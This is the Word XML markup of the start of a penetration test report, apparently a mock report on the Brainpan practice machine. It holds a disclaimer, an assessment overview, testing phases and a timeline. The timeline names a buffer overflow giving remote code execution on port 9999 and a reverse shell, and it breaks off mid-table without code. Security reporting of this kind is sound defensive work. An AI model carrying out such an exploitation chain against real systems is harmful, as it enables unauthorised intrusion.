      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This document is the exclusive property of Brainpan and </w:t>
      </w:r>
      <w:r w:rsidR="00A5704D" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sh3llsh0ck</w:t>
      </w:r>
      <w:r w:rsidR="006F140D" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sec</w:t>
      </w:r>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This document contains proprietary and confidential information. Duplication, redistribution, or use, in whole or in part, in any form, requires consent of both </w:t>
      </w:r>
      <w:r w:rsidR="00A5704D" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Brainpan</w:t>
      </w:r>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00A5704D" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sh3ll</w:t>
      </w:r>
      <w:r w:rsidR="006F140D" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sh0ck Sec</w:t>
      </w:r>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E401FA" w14:textId="75B6C708" w:rsidR="004C00F2" w:rsidRPr="00C416A9" w:rsidRDefault="00232A83" w:rsidP="004C00F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="136"/>
        <w:ind w:left="238" w:right="233"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Brainpan</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may</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share</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this</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document</w:t>
      </w:r>
      <w:r w:rsidR="004C00F2" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C00F2" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>with</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auditors</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under</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non-disclosure</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agreements</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to</w:t>
      </w:r>
      <w:r w:rsidR="004C00F2" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C00F2" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>demonstrate penetration test requirement compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C1279F" w14:textId="77777777" w:rsidR="0046066B" w:rsidRDefault="0046066B" w:rsidP="3EFF00EC"/>
    <w:p w14:paraId="2C67F2E6" w14:textId="77777777" w:rsidR="00D339C4" w:rsidRDefault="00D339C4" w:rsidP="00D339C4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc141061092"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="304DEC3A" w14:textId="6B37B9F3" w:rsidR="009C2D21" w:rsidRPr="00C416A9" w:rsidRDefault="00B279DF" w:rsidP="00B279DF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="238" w:right="234"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A penetration test captures a specific moment in time, focusing on the information gathered during the assessment and not accounting for any subsequent changes or updates. Due to the time constraints of such engagements, it is not possible to thoroughly evaluate all security controls. Instead, </w:t>
      </w:r>
      <w:r w:rsidR="009C2D21" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sh3llsh0ck Sec</w:t>
      </w:r>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> prioritizes the assessment to pinpoint the most vulnerable security controls that an attacker could target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08357D35" w14:textId="3950266E" w:rsidR="3EFF00EC" w:rsidRPr="00C416A9" w:rsidRDefault="00B279DF" w:rsidP="00B279DF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="238" w:right="234"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To maintain the effective</w:t>
      </w:r>
      <w:r w:rsidR="00C161E7" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ess of these controls, </w:t>
      </w:r>
      <w:r w:rsidR="009C2D21" w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sh3llsh0ck Sec</w:t>
      </w:r>
      <w:r w:rsidRPr="00C416A9">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suggests conducting similar assessments annually, either by internal or third-party assessors. This periodic evaluation ensures the ongoing strength of the security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE85024" w14:textId="77777777" w:rsidR="004E0CDC" w:rsidRDefault="004E0CDC" w:rsidP="00B279DF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="238" w:right="234"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E5AD96" w14:textId="77777777" w:rsidR="00C83DF8" w:rsidRDefault="00C83DF8" w:rsidP="00C83DF8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc141061093"/>
      <w:r>
        <w:t xml:space="preserve">Assessment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="29718EF0" w14:textId="4EA97442" w:rsidR="004E0CDC" w:rsidRPr="00BB1D47" w:rsidRDefault="00ED7F75" w:rsidP="00B279DF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="238" w:right="234"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="0056016A" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">June 20, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0056016A" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2023</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0056016A" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to June 21, 2023, Brainpan contracted </w:t>
      </w:r>
      <w:r w:rsidR="00851173" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sh3llsh0ck Sec to perform a </w:t>
      </w:r>
      <w:r w:rsidR="00F63DD8" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">black box penetration test on </w:t>
      </w:r>
      <w:r w:rsidR="00E537A3" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">one of its public-facing machines. </w:t>
      </w:r>
      <w:r w:rsidR="00044CFD" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A black box penetration test is a type of security assessment where the tester has no prior knowledge about the target system or network. In this approach, the tester simulates an external attacker who has no insider information or access to the internal infrastructure.</w:t>
      </w:r>
      <w:r w:rsidR="00594157" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E502673" w14:textId="37B6562C" w:rsidR="00510889" w:rsidRPr="00BB1D47" w:rsidRDefault="00510889" w:rsidP="00B279DF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="238" w:right="234"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The phases of penetration testing included the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C3AE44" w14:textId="77777777" w:rsidR="00725E85" w:rsidRPr="00BB1D47" w:rsidRDefault="00725E85" w:rsidP="00725E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="959"/>
          <w:tab w:val="left" w:pos="960"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="120" w:after="0" w:line="293" w:lineRule="exact"/>
        <w:ind w:hanging="361"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
        <w:t xml:space="preserve">Planning – Customer goals are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
        <w:t>gathered</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
        <w:t xml:space="preserve"> and rules of engagement obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73015525" w14:textId="77777777" w:rsidR="00725E85" w:rsidRPr="00BB1D47" w:rsidRDefault="00725E85" w:rsidP="00725E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="959"/>
          <w:tab w:val="left" w:pos="960"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="649"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
        <w:t>Discovery – Perform scanning and enumeration to identify potential vulnerabilities, weak areas, and exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C629B" w14:textId="77777777" w:rsidR="00725E85" w:rsidRPr="00BB1D47" w:rsidRDefault="00725E85" w:rsidP="00725E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="958"/>
          <w:tab w:val="left" w:pos="959"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="958" w:right="1057"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
        <w:t>Attack – Confirm potential vulnerabilities through exploitation and perform additional discovery upon new access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF9904" w14:textId="4586DDC3" w:rsidR="00725E85" w:rsidRPr="00BB1D47" w:rsidRDefault="00725E85" w:rsidP="00725E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="958"/>
          <w:tab w:val="left" w:pos="959"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="958" w:right="478"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:eastAsia="Franklin Gothic Book" w:hAnsi="Avenir Next LT Pro" w:cs="Franklin Gothic Book"/>
        </w:rPr>
        <w:t>Reporting – Document all found vulnerabilities and exploits, failed attempts, and company strengths and weaknesses</w:t>
      </w:r>
      <w:r w:rsidR="00052733" w:rsidRPr="00BB1D47">
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011CB669" w14:textId="092A4B8E" w:rsidR="00306AB4" w:rsidRDefault="00306AB4" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc141061094"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="60A51BD9" w14:textId="133C1552" w:rsidR="00306AB4" w:rsidRDefault="00306AB4" w:rsidP="00306AB4">
      <w:r>
        <w:t>The following is a timeline of the</w:t>
      </w:r>
      <w:r w:rsidR="001209DC">
        <w:t xml:space="preserve"> progression points</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D92C42">
        <w:t xml:space="preserve">through the </w:t>
      </w:r>
      <w:r>
        <w:t>penetration test.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5395"/>
        <w:gridCol w:w="5395"/>
      </w:tblGrid>
      <w:tr w:rsidR="0062735B" w14:paraId="50623385" w14:textId="77777777" w:rsidTr="00AA292C">
        <w:trPr>
          <w:trHeight w:val="611"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="99B8EB"/>
          </w:tcPr>
          <w:p w14:paraId="521C7FBB" w14:textId="30F78049" w:rsidR="0062735B" w:rsidRPr="0062735B" w:rsidRDefault="0062735B" w:rsidP="00FC56AD">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062735B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
            <w:r w:rsidR="00E14A41">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="0062735B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="99B8EB"/>
          </w:tcPr>
          <w:p w14:paraId="2A5D17AE" w14:textId="350B3293" w:rsidR="0062735B" w:rsidRPr="0062735B" w:rsidRDefault="0062735B" w:rsidP="00FC56AD">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062735B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062735B" w14:paraId="276BF44C" w14:textId="77777777" w:rsidTr="00FC56AD">
        <w:trPr>
          <w:trHeight w:val="674"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="625F4FD4" w14:textId="1248F4D1" w:rsidR="0062735B" w:rsidRDefault="00FC56AD" w:rsidP="00FC56AD">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6.20.23 </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 10:00 A.M.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7D866209" w14:textId="2E13E5EE" w:rsidR="0062735B" w:rsidRDefault="00FC56AD" w:rsidP="00FC56AD">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Commencement of penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062735B" w14:paraId="4B0ECB20" w14:textId="77777777" w:rsidTr="0062735B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7387D95A" w14:textId="79B374AE" w:rsidR="0062735B" w:rsidRDefault="00FC56AD" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6.20.23 </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 10:30 A.M.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DAA586B" w14:textId="6FB4DD66" w:rsidR="0062735B" w:rsidRDefault="00FC56AD" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Nmap scan enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062735B" w14:paraId="065686FC" w14:textId="77777777" w:rsidTr="0062735B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="119364B1" w14:textId="433C64CB" w:rsidR="0062735B" w:rsidRDefault="00FC56AD" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6.20.23 </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 11:00 A.M.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E8A9A83" w14:textId="50122CE0" w:rsidR="0062735B" w:rsidRDefault="00FC56AD" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Download of brainpan.exe from webserver (/bin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC56AD" w14:paraId="599A069A" w14:textId="77777777" w:rsidTr="0062735B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="512988FC" w14:textId="4BDDDAC1" w:rsidR="00FC56AD" w:rsidRDefault="00FC56AD" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6.20.23 </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 2:00 P.M.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4178FD4B" w14:textId="441E73B1" w:rsidR="00FC56AD" w:rsidRDefault="00FC56AD" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Buffer overflow to RCE on port 9999; Reverse shell as </w:t>
            </w:r>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:t>puck</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC56AD" w14:paraId="28B2EE3C" w14:textId="77777777" w:rsidTr="0062735B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
